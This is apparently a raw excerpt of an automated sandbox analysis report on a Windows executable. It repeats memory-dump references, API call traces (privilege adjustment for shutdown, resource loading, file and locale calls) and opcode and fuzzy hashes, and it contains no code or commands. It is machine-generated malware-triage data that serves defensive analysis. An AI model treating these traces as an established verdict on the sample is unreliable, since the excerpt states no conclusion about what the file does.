• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                      APIs
                                                                                                      • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrev
                                                                                                      • String ID:
                                                                                                      • API String ID: 122130370-0
                                                                                                      • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                      • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                      • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                      • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                      • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                      • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                      • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                      • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                      • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                      • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                      • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                      • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                      • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                      • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SystemTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2656138-0
                                                                                                      • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                      • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                      • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                      • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                      • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                      • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                      • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                      • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-2401316094
                                                                                                      • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                      • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                      • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                      • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                        • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                        • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                      • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                      • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                      • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                      • LocalFree.KERNEL32(0070B060,00000000,00401AB4), ref: 00401A1B
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,0070B060,00000000,00401AB4), ref: 00401A3A
                                                                                                      • LocalFree.KERNEL32(0070C060,?,00000000,00008000,0070B060,00000000,00401AB4), ref: 00401A79
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3782394904-0
                                                                                                      • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                      • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                                      • API String ID: 1220098344-1503883590
                                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
